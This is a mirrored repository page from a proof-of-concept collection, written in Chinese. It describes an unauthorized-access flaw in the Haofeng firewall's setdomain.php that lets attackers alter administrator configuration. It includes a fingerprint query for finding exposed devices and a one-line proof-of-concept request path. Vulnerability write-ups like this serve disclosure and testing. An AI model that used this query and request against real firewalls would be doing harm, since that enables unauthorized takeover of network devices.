admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-08 12:25:11 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/网络设备漏洞/皓峰防火墙 setdomain.php 越权访问漏洞.md
Threekiii 11de4c1d47 update
2024-11-06 14:10:36 +08:00

31 lines
441 B
Markdown
Raw Blame History

# 皓峰防火墙 setdomain.php 越权访问漏洞
## 漏洞描述
皓峰防火墙 setdomain.php 页面存在越权访问漏洞,攻击者通过漏洞可修改管理员等配置信息
## 漏洞影响
```
皓峰防火墙
```
## 网络测绘
```
app="皓峰防火墙系统登录"
```
## 漏洞复现
登录页面
![img](images/202202110917093.png)
验证POC
```php
/setdomain.php?action=list
```
![img](images/202202110916092.png)
Reference in New Issue View Git Blame Copy Permalink